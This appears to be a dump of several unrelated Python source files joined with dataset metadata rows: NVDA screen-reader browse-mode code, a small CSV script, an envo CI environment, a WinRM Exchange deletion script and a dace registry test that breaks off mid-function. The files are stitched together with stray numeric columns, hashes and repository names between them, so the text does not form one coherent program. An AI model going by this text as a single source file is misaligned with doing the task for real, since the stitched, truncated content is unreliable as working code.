speech.speakObject(self.rootNVDAObject, reason=OutputReason.FOCUS)
info = self.selection
if not info.isCollapsed:
speech.speakPreselectedText(info.text)
else:
info.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(info, reason=OutputReason.CARET, unit=textInfos.UNIT_LINE)
reportPassThrough(self)
braille.handler.handleGainFocus(self)
def event_caret(self, obj, nextHandler):
if self.passThrough:
nextHandler()
def _activateLongDesc(self,controlField):
"""
Activates (presents) the long description for a particular field (usually a graphic).
@param controlField: the field who's long description should be activated. This field is guaranteed to have states containing HASLONGDESC state.
@type controlField: dict
"""
raise NotImplementedError
def _activatePosition(self, obj=None, info=None):
if info:
obj=info.NVDAObjectAtStart
if not obj:
return
super(BrowseModeDocumentTreeInterceptor,self)._activatePosition(obj=obj)
def _set_selection(self, info, reason=OutputReason.CARET):
super(BrowseModeDocumentTreeInterceptor, self)._set_selection(info)
if isScriptWaiting() or not info.isCollapsed:
return
# Save the last caret position for use in terminate().
# This must be done here because the buffer might be cleared just before terminate() is called,
# causing the last caret position to be lost.
caret = info.copy()
caret.collapse()
self._lastCaretPosition = caret.bookmark
review.handleCaretMove(caret)
if reason == OutputReason.FOCUS:
self._lastCaretMoveWasFocus = True
focusObj = api.getFocusObject()
if focusObj==self.rootNVDAObject:
return
else:
self._lastCaretMoveWasFocus = False
focusObj=info.focusableNVDAObjectAtStart
obj=info.NVDAObjectAtStart
if not obj:
log.debugWarning("Invalid NVDAObjectAtStart")
return
if obj==self.rootNVDAObject:
return
obj.scrollIntoView()
if self.programmaticScrollMayFireEvent:
self._lastProgrammaticScrollTime = time.time()
if focusObj:
self.passThrough = self.shouldPassThrough(focusObj, reason=reason)
if (
not eventHandler.isPendingEvents("gainFocus")
and focusObj != self.rootNVDAObject
and focusObj != api.getFocusObject()
and self._shouldSetFocusToObj(focusObj)
):
followBrowseModeFocus = config.conf["virtualBuffers"]["autoFocusFocusableElements"]
if followBrowseModeFocus or self.passThrough:
focusObj.setFocus()
# Queue the reporting of pass through mode so that it will be spoken after the actual content.
queueHandler.queueFunction(queueHandler.eventQueue, reportPassThrough, self)
def _shouldSetFocusToObj(self, obj):
"""Determine whether an object should receive focus.
Subclasses may extend or override this method.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
"""
return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.Role.EMBEDDEDOBJECT
def script_activateLongDesc(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand("character")
for field in reversed(info.getTextWithFields()):
if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart":
states=field.field.get('states')
if states and controlTypes.State.HASLONGDESC in states:
self._activateLongDesc(field.field)
break
else:
# Translators: the message presented when the activateLongDescription script cannot locate a long description to activate.
ui.message(_("No long description"))
# Translators: the description for the activateLongDescription script on browseMode documents.
script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.")
def event_caretMovementFailed(self, obj, nextHandler, gesture=None):
if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]:
return nextHandler()
if gesture.mainKeyName in ("home", "end"):
# Home, end, control+home and control+end should not disable pass through.
return nextHandler()
script = self.getScript(gesture)
if not script:
return nextHandler()
# We've hit the edge of the focused control.
# Therefore, move the virtual caret to the same edge of the field.
info = self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CONTROLFIELD)
if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"):
info.collapse()
else:
info.collapse(end=True)
info.move(textInfos.UNIT_CHARACTER, -1)
info.updateCaret()
scriptHandler.queueScript(script, gesture)
currentExpandedControl=None #: an NVDAObject representing the control that has just been expanded with the collapseOrExpandControl script.
def script_collapseOrExpandControl(self, gesture):
if not config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
self._focusLastFocusableObject()
oldFocus = api.getFocusObject()
oldFocusStates = oldFocus.states
gesture.send()
if controlTypes.State.COLLAPSED in oldFocusStates:
self.passThrough = True
# When a control (such as a combo box) is expanded, we expect that its descendants will be classed as being outside the browseMode document.
# We save off the expanded control so that the next focus event within the browseMode document can see if it is for the control,
# and if so, it disables passthrough, as the control has obviously been collapsed again.
self.currentExpandedControl=oldFocus
elif not self.disableAutoPassThrough:
self.passThrough = False
reportPassThrough(self)
def _tabOverride(self, direction):
"""Override the tab order if the virtual caret is not within the currently focused node.
This is done because many nodes are not focusable and it is thus possible for the virtual caret to be unsynchronised with the focus.
In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual caret.
If the virtual caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation.
Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned.
@param direction: The direction in which to move.
@type direction: str
@return: C{True} if the tab order was overridden, C{False} if not.
@rtype: bool
"""
if self._lastCaretMoveWasFocus:
# #5227: If the caret was last moved due to a focus change, don't override tab.
# This ensures that tabbing behaves as expected after tabbing hits an iframe document.
return False
focus = api.getFocusObject()
try:
focusInfo = self.makeTextInfo(focus)
except:
return False
# We only want to override the tab order if the caret is not within the focused node.
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
#Only check that the caret is within the focus for things that ar not documents
#As for documents we should always override
if focus.role!=controlTypes.Role.DOCUMENT or controlTypes.State.EDITABLE in focus.states:
# Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if focusInfo.isOverlapping(caretInfo):
return False
# If we reach here, we do want to override tab/shift+tab if possible.
# Find the next/previous focusable node.
try:
item = next(self._iterNodesByType("focusable", direction, caretInfo))
except StopIteration:
return False
obj=item.obj
newInfo=item.textInfo
if obj == api.getFocusObject():
# This node is already focused, so we need to move to and speak this node here.
newCaret = newInfo.copy()
newCaret.collapse()
self._set_selection(newCaret, reason=OutputReason.FOCUS)
if self.passThrough:
obj.event_gainFocus()
else:
speech.speakTextInfo(newInfo, reason=OutputReason.FOCUS)
else:
# This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest.
obj.setFocus()
return True
def script_tab(self, gesture):
if not self._tabOverride("next"):
gesture.send()
def script_shiftTab(self, gesture):
if not self._tabOverride("previous"):
gesture.send()
def event_focusEntered(self,obj,nextHandler):
if obj==self.rootNVDAObject:
self._enteringFromOutside = True
# Even if passThrough is enabled, we still completely drop focusEntered events here.
# In order to get them back when passThrough is enabled, we replay them with the _replayFocusEnteredEvents method in event_gainFocus.
# The reason for this is to ensure that focusEntered events are delayed until a focus event has had a chance to disable passthrough mode.
# As in this case we would not want them.
def _shouldIgnoreFocus(self, obj):
"""Determines whether focus on a given object should be ignored.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if focus on L{obj} should be ignored, C{False} otherwise.
@rtype: bool
"""
return False
def _postGainFocus(self, obj):
"""Executed after a gainFocus within the browseMode document.
This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler.
@param obj: The object that gained focus.
@type obj: L{NVDAObjects.NVDAObject}
"""
def _replayFocusEnteredEvents(self):
# We blocked the focusEntered events because we were in browse mode,
# but now that we've switched to focus mode, we need to fire them.
for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]:
try:
parent.event_focusEntered()
except:
log.exception("Error executing focusEntered event: %s" % parent)
def event_gainFocus(self, obj, nextHandler):
enteringFromOutside=self._enteringFromOutside
self._enteringFromOutside=False
if not self.isReady:
if self.passThrough:
self._replayFocusEnteredEvents()
nextHandler()
return
# If a control has been expanded by the collapseOrExpandControl script, and this focus event is for it,
# disable passThrough and report the control, as the control has obviously been collapsed again.
# Note that whether or not this focus event was for that control, the last expanded control is forgotten, so that only the next focus event for the browseMode document can handle the collapsed control.
lastExpandedControl=self.currentExpandedControl
self.currentExpandedControl=None
if self.passThrough and obj==lastExpandedControl:
self.passThrough=False
reportPassThrough(self)
nextHandler()
return
if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj:
# We're entering the document from outside (not returning from an inside object/application; #3145)
# and this was the last non-root node with focus, so ignore this focus event.
# Otherwise, if the user switches away and back to this document, the cursor will jump to this node.
# This is not ideal if the user was positioned over a node which cannot receive focus.
return
if obj==self.rootNVDAObject:
if self.passThrough:
self._replayFocusEnteredEvents()
return nextHandler()
return
if not self.passThrough and self._shouldIgnoreFocus(obj):
return
# If the previous focus object was removed, we might hit a false positive for overlap detection.
# Track the previous focus target so that we can account for this scenario.
previousFocusObjIsDefunct = False
if self._lastFocusObj:
try:
states = self._lastFocusObj.states
previousFocusObjIsDefunct = controlTypes.State.DEFUNCT in states
except Exception:
log.debugWarning(
"Error fetching states when checking for defunct object. Treating object as defunct anyway.",
exc_info=True
)
previousFocusObjIsDefunct = True
self._lastFocusObj=obj
try:
focusInfo = self.makeTextInfo(obj)
except:
# This object is not in the treeInterceptor, even though it resides beneath the document.
# Automatic pass through should be enabled in certain circumstances where this occurs.
if not self.passThrough and self.shouldPassThrough(obj, reason=OutputReason.FOCUS):
self.passThrough=True
reportPassThrough(self)
self._replayFocusEnteredEvents()
return nextHandler()
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
isOverlapping = focusInfo.isOverlapping(caretInfo)
if not self._hadFirstGainFocus or not isOverlapping or (isOverlapping and previousFocusObjIsDefunct):
# The virtual caret is not within the focus node.
oldPassThrough=self.passThrough
passThrough = self.shouldPassThrough(obj, reason=OutputReason.FOCUS)
if not oldPassThrough and (passThrough or sayAll.SayAllHandler.isRunning()):
# If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop.
# This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change.
speech.cancelSpeech()
self.passThrough=passThrough
if not self.passThrough:
# We read the info from the browseMode document instead of the control itself.
speech.speakTextInfo(focusInfo, reason=OutputReason.FOCUS)
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj, controlTypes.OutputReason.ONLYCACHE)
# As we do not call nextHandler which would trigger the vision framework to handle gain focus,
# we need to call it manually here.
vision.handler.handleGainFocus(obj)
else:
# Although we are going to speak the object rather than textInfo content, we still need to silently speak the textInfo content so that the textInfo speech cache is updated correctly.
# Not doing this would cause later browseMode speaking to either not speak controlFields it had entered, or speak controlField exits after having already exited.
# See #7435 for a discussion on this.
speech.speakTextInfo(focusInfo, reason=OutputReason.ONLYCACHE)
self._replayFocusEnteredEvents()
nextHandler()
focusInfo.collapse()
self._set_selection(focusInfo, reason=OutputReason.FOCUS)
else:
# The virtual caret was already at the focused node.
if not self.passThrough:
# This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking.
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj, OutputReason.ONLYCACHE)
if config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
# As we do not call nextHandler which would trigger the vision framework to handle gain focus,
# we need to call it manually here.
# Note: this is usually called after the caret movement.
vision.handler.handleGainFocus(obj)
elif (
self._objPendingFocusBeforeActivate
and obj == self._objPendingFocusBeforeActivate
and obj is not self._objPendingFocusBeforeActivate
):
# With auto focus focusable elements disabled, when the user activates
# an element (e.g. by pressing enter) or presses a key which we pass
# through (e.g. control+enter), we call _focusLastFocusableObject.
# However, the activation/key press might cause a property change
# before we get the focus event, so NVDA's normal reporting of
# changes to the focus won't pick it up.
# The speech property cache on _objPendingFocusBeforeActivate reflects
# the properties before the activation/key, so use that to speak any
# changes.
speech.speakObject(
self._objPendingFocusBeforeActivate,
OutputReason.CHANGE
)
self._objPendingFocusBeforeActivate = None
else:
self._replayFocusEnteredEvents()
return nextHandler()
self._postGainFocus(obj)
event_gainFocus.ignoreIsReady=True
def _handleScrollTo(
self,
obj: Union[NVDAObject, textInfos.TextInfo],
) -> bool:
"""Handle scrolling the browseMode document to a given object in response to an event.
Subclasses should call this from an event which indicates that the document has scrolled.
@postcondition: The virtual caret is moved to L{obj} and the buffer content for L{obj} is reported.
@param obj: The object to which the document should scroll.
@return: C{True} if the document was scrolled, C{False} if not.
@note: If C{False} is returned, calling events should probably call their nextHandler.
"""
if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4:
# This event was probably caused by this browseMode document's call to scrollIntoView().
# Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point.
# However, pretend we handled it, as we don't want it to be passed on to the object either.
return True
if isinstance(obj, NVDAObject):
try:
scrollInfo = self.makeTextInfo(obj)
except (NotImplementedError, RuntimeError):
return False
elif isinstance(obj, textInfos.TextInfo):
scrollInfo = obj.copy()
else:
raise ValueError(f"{obj} is not a supported type")
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if not scrollInfo.isOverlapping(caretInfo):
if scrollInfo.isCollapsed:
scrollInfo.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(scrollInfo, reason=OutputReason.CARET)
scrollInfo.collapse()
self.selection = scrollInfo
return True
return False
def _isNVDAObjectInApplication_noWalk(self, obj):
"""Determine whether a given object is within an application without walking ancestors.
The base implementation simply checks whether the object has an application role.
Subclasses can override this if they can provide a definite answer without needing to walk.
For example, for virtual buffers, if the object is in the buffer,
it definitely isn't in an application.
L{_isNVDAObjectInApplication} calls this and walks to the next ancestor if C{None} is returned.
@return: C{True} if definitely in an application,
C{False} if definitely not in an application,
C{None} if this can't be determined without walking ancestors.
"""
if (
# roles such as application and dialog should be treated as being within a "application" and therefore outside of the browseMode document.
obj.role in self.APPLICATION_ROLES
# Anything other than an editable text box inside a combo box should be
# treated as being outside a browseMode document.
or (
obj.role != controlTypes.Role.EDITABLETEXT and obj.container
and obj.container.role == controlTypes.Role.COMBOBOX
)
):
return True
return None
def _isNVDAObjectInApplication(self, obj):
"""Determine whether a given object is within an application.
The object is considered to be within an application if it or one of its ancestors has an application role.
This should only be called on objects beneath the treeInterceptor's root NVDAObject.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if L{obj} is within an application, C{False} otherwise.
@rtype: bool
"""
# We cache the result for each object we walk.
# There can be browse mode documents within other documents and the result might be different between these,
# so the cache must be maintained on the TreeInterceptor rather than the object itself.
try:
cache = self._isInAppCache
except AttributeError:
# Create this lazily, as this method isn't used by all browse mode implementations.
cache = self._isInAppCache = weakref.WeakKeyDictionary()
objs = []
def doResult(result):
# Cache this on descendants we've walked over.
for obj in objs:
cache[obj] = result
return result
while obj and obj != self.rootNVDAObject:
inApp = cache.get(obj)
if inApp is not None:
# We found a cached result.
return doResult(inApp)
objs.append(obj)
inApp = self._isNVDAObjectInApplication_noWalk(obj)
if inApp is not None:
return doResult(inApp)
# We must walk ancestors.
# Cache container.
container = obj.container
obj.container = container
obj = container
return doResult(False)
def _get_documentConstantIdentifier(self):
"""Get the constant identifier for this document.
This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application.
Generally, the document URL should be used.
@return: The constant identifier for this document, C{None} if there is none.
"""
return None
def _get_shouldRememberCaretPositionAcrossLoads(self):
"""Specifies whether the position of the caret should be remembered when this document is loaded again.
This is useful when the browser remembers the scroll position for the document,
but does not communicate this information via APIs.
The remembered caret position is associated with this document using L{documentConstantIdentifier}.
@return: C{True} if the caret position should be remembered, C{False} if not.
@rtype: bool
"""
docConstId = self.documentConstantIdentifier
# Return True if the URL indicates that this is probably a web browser document.
# We do this check because we don't want to remember caret positions for email messages, etc.
if isinstance(docConstId, str):
protocols=("http", "https", "ftp", "ftps", "file")
protocol=docConstId.split("://", 1)[0]
return protocol in protocols
return False
def _getInitialCaretPos(self):
"""Retrieve the initial position of the caret after the buffer has been loaded.
This position, if any, will be passed to L{makeTextInfo}.
Subclasses should extend this method.
@return: The initial position of the caret, C{None} if there isn't one.
@rtype: TextInfo position
"""
if self.shouldRememberCaretPositionAcrossLoads:
try:
return self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier]
except KeyError:
pass
return None
def getEnclosingContainerRange(self, textRange):
textRange = textRange.copy()
textRange.collapse()
try:
item = next(self._iterNodesByType("container", "up", textRange))
except (NotImplementedError,StopIteration):
try:
item = next(self._iterNodesByType("landmark", "up", textRange))
except (NotImplementedError,StopIteration):
return
return item.textInfo
def script_moveToStartOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
# Translators: Reported when the user attempts to move to the start or end of a container
# (list, table, etc.) but there is no container.
ui.message(_("Not in a container"))
return
container.collapse()
self._set_selection(container, reason=OutputReason.QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=OutputReason.FOCUS)
script_moveToStartOfContainer.resumeSayAllMode = sayAll.CURSOR.CARET
# Translators: Description for the Move to start of container command in browse mode.
script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table")
def script_movePastEndOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
# Translators: Reported when the user attempts to move to the start or end of a container
# (list, table, etc.) but there is no container.
ui.message(_("Not in a container"))
return
container.collapse(end=True)
docEnd=container.obj.makeTextInfo(textInfos.POSITION_LAST)
if container.compareEndPoints(docEnd,"endToEnd")>=0:
container=docEnd
# Translators: a message reported when:
# Review cursor is at the bottom line of the current navigator object.
# Landing at the end of a browse mode document when trying to jump to the end of the current container.
ui.message(_("Bottom"))
self._set_selection(container, reason=OutputReason.QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=OutputReason.FOCUS)
script_movePastEndOfContainer.resumeSayAllMode = sayAll.CURSOR.CARET
# Translators: Description for the Move past end of container command in browse mode.
script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table")
NOT_LINK_BLOCK_MIN_LEN = 30
def _isSuitableNotLinkBlock(self, textRange):
return len(textRange.text) >= self.NOT_LINK_BLOCK_MIN_LEN
def _iterNotLinkBlock(self, direction="next", pos=None):
links = self._iterNodesByType("link", direction=direction, pos=pos)
# We want to compare each link against the next link.
item1 = next(links, None)
if item1 is None:
return
for item2 in links:
# If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar.
if direction=="previous":
textRange=item1.textInfo.copy()
textRange.collapse()
textRange.setEndPoint(item2.textInfo,"startToEnd")
else:
textRange=item2.textInfo.copy()
textRange.collapse()
textRange.setEndPoint(item1.textInfo,"startToEnd")
if self._isSuitableNotLinkBlock(textRange):
yield TextInfoQuickNavItem("notLinkBlock", self, textRange)
item1=item2
__gestures={
"kb:NVDA+d": "activateLongDesc",
"kb:alt+upArrow": "collapseOrExpandControl",
"kb:alt+downArrow": "collapseOrExpandControl",
"kb:tab": "tab",
"kb:shift+tab": "shiftTab",
"kb:shift+,": "moveToStartOfContainer",
"kb:,": "movePastEndOfContainer",
}
@script(
description=_(
# Translators: the description for the toggleScreenLayout script.
"Toggles on and off if the screen layout is preserved while rendering the document content"
),
gesture="kb:NVDA+v",
)
def script_toggleScreenLayout(self, gesture):
# Translators: The message reported for not supported toggling of screen layout
ui.message(_("Not supported in this document."))
| 44.265625
| 229
| 0.740899
| 10,985
| 84,990
| 5.67929
| 0.117979
| 0.025005
| 0.015837
| 0.019491
| 0.365092
| 0.303765
| 0.279145
| 0.263516
| 0.258243
| 0.249427
| 0
| 0.002256
| 0.181245
| 84,990
| 1,919
| 230
| 44.288692
| 0.894289
| 0.426191
| 0
| 0.297735
| 0
| 0.000809
| 0.134236
| 0.011349
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072816
| false
| 0.072006
| 0.032362
| 0.008091
| 0.193366
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9f9cd4e7a0b73e79eb71d2bdbfa755d69a9cc9d
| 597
|
py
|
Python
|
examples/first_char_last_column.py
|
clarkfitzg/sta141c
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 24
|
2019-01-08T20:10:11.000Z
|
2021-11-26T12:18:58.000Z
|
examples/first_char_last_column.py
|
timilchene/sta141c-winter19
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 1
|
2017-06-25T05:35:24.000Z
|
2017-06-25T05:35:24.000Z
|
examples/first_char_last_column.py
|
timilchene/sta141c-winter19
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 22
|
2019-01-08T20:02:15.000Z
|
2021-12-16T23:27:56.000Z
|
#!/usr/bin/env python3
"""
For the last column, print only the first character.
Usage:
$ printf "100,200\n0,\n" | python3 first_char_last_column.py
Should print "100,2\n0,"
"""
import csv
from sys import stdin, stdout
def main():
reader = csv.reader(stdin)
writer = csv.writer(stdout)
for row in reader:
try:
row[-1] = row[-1][0]
except IndexError:
# Python: Better to ask forgiveness than permission
# Alternative: Look before you leap
pass
writer.writerow(row)
if __name__ == "__main__":
main()
| 19.258065
| 64
| 0.606365
| 79
| 597
| 4.443038
| 0.696203
| 0.05698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03972
| 0.283082
| 597
| 30
| 65
| 19.9
| 0.780374
| 0.425461
| 0
| 0
| 0
| 0
| 0.024242
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.076923
| 0.153846
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9fb744315858b3e553e097f0866c6de49262adf
| 1,996
|
py
|
Python
|
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | null | null | null |
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | null | null | null |
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | 1
|
2022-01-01T15:14:42.000Z
|
2022-01-01T15:14:42.000Z
|
from pathlib import Path
root = Path(__file__).parent.absolute()
import envo
envo.add_source_roots([root])
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
from envo import Env, Namespace, env_var, logger, run
from env_comm import StickybeakCommEnv as ParentEnv
p = Namespace("p")
class StickybeakCiEnv(ParentEnv):
class Meta(ParentEnv.Meta):
stage: str = "ci"
emoji: str = "⚙"
load_env_vars = True
class Environ(ParentEnv.Environ):
pypi_username: Optional[str] = env_var(raw=True)
pypi_password: Optional[str] = env_var(raw=True)
e: Environ
def init(self) -> None:
super().init()
@p.command
def bootstrap(self, test_apps=True) -> None:
super().bootstrap(test_apps)
@p.command
def test(self) -> None:
run("pytest --reruns 2 -v tests")
@p.command
def build(self) -> None:
run("poetry build")
@p.command
def publish(self) -> None:
run(f'poetry publish --username "{self.e.pypi_username}" --password "{self.e.pypi_password}"', verbose=False)
@p.command
def rstcheck(self) -> None:
pass
# run("rstcheck README.rst | tee ./workspace/rstcheck.txt")
@p.command
def flake(self) -> None:
pass
# run("flake8 . | tee ./workspace/flake8.txt")
@p.command
def check_black(self) -> None:
run("black --check .")
@p.command
def check_isort(self) -> None:
run("black --check .")
@p.command
def mypy(self) -> None:
pass
run("mypy .")
@p.command
def generate_version(self) -> None:
import toml
config = toml.load(str(self.meta.root / "pyproject.toml"))
version: str = config["tool"]["poetry"]["version"]
version_file = self.meta.root / "stickybeak/__version__.py"
Path(version_file).touch()
version_file.write_text(f'__version__ = "{version}"\n')
ThisEnv = StickybeakCiEnv
| 22.942529
| 117
| 0.613727
| 251
| 1,996
| 4.752988
| 0.36255
| 0.067058
| 0.092205
| 0.03772
| 0.093881
| 0.093881
| 0.053646
| 0.053646
| 0
| 0
| 0
| 0.002003
| 0.249499
| 1,996
| 86
| 118
| 23.209302
| 0.793725
| 0.051102
| 0
| 0.298246
| 0
| 0
| 0.130619
| 0.038604
| 0
| 0
| 0
| 0
| 0
| 1
| 0.192982
| false
| 0.087719
| 0.122807
| 0
| 0.385965
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a29eefe067ae42942e4915562e64419af3d1cde
| 950
|
py
|
Python
|
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | null | null | null |
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | 2
|
2020-05-27T07:15:28.000Z
|
2020-12-17T05:22:54.000Z
|
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# All params from IdM is stored in environment and you can get them by os.environ["paramName"]
import sys, os
# this is needed for importing file winrm_wrapper from parent dir
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import winrm_wrapper
import codecs
uid = os.environ["__UID__"]
winrm_wrapper.writeLog("Delete start for " + uid)
# Load PS script from file and replace params
winrm_wrapper.writeLog("loading script")
f = codecs.open(os.environ["script"], encoding='utf-8', mode='r')
command = f.read()
command = command.replace("$uid", uid)
# Call wrapper
winrm_wrapper.executeScript(os.environ["endpoint"], os.environ["authentication"], os.environ["user"],
os.environ["password"], os.environ["caTrustPath"], os.environ["ignoreCaValidation"], command, uid)
winrm_wrapper.writeLog("Delete end for " + uid)
print("__UID__=" + uid)
sys.exit()
| 35.185185
| 134
| 0.705263
| 133
| 950
| 4.902256
| 0.503759
| 0.124233
| 0.092025
| 0.070552
| 0.088957
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00369
| 0.144211
| 950
| 26
| 135
| 36.538462
| 0.798278
| 0.270526
| 0
| 0
| 0
| 0
| 0.206696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.2
| 0
| 0.2
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a2ac410faa6645af8d41c21c8f5834684cf1a20
| 2,152
|
py
|
Python
|
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T13:36:34.000Z
|
2022-03-11T13:36:34.000Z
|
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import unittest
from aenum import Enum, auto
from dace import registry
@registry.make_registry
class ExtensibleClass(object):
pass
class Extension(ExtensibleClass):
pass
@registry.extensible_enum
class ExtensibleEnumeration(Enum):
a = auto()
b = auto()
class RegistryTests(unittest.TestCase):
def test_class_registry(self):
ExtensibleClass.register(Extension)
self.assertTrue(Extension in ExtensibleClass.extensions())
ExtensibleClass.unregister(Extension)
self.assertTrue(Extension not in ExtensibleClass.extensions())
def test_autoregister(self):
@registry.autoregister
class Extension2(ExtensibleClass):
pass
self.assertTrue(Extension2 in ExtensibleClass.extensions())
def test_class_registry_args(self):
ExtensibleClass.register(Extension, a=True, b=1, c=2)
self.assertTrue(Extension in ExtensibleClass.extensions())
self.assertEqual(ExtensibleClass.extensions()[Extension], dict(a=True, b=1, c=2))
ExtensibleClass.unregister(Extension)
self.assertTrue(Extension not in ExtensibleClass.extensions())
def test_autoregister_args(self):
@registry.autoregister_params(a=False, b=0)
class Extension3(ExtensibleClass):
pass
self.assertTrue(Extension3 in ExtensibleClass.extensions())
self.assertEqual(ExtensibleClass.extensions()[Extension3], dict(a=False, b=0))
def test_autoregister_fail(self):
with self.assertRaises(TypeError):
@registry.autoregister
class Extension4(object):
pass
def test_enum_registry(self):
ExtensibleEnumeration.register('c')
self.assertTrue(ExtensibleEnumeration.c in ExtensibleEnumeration)
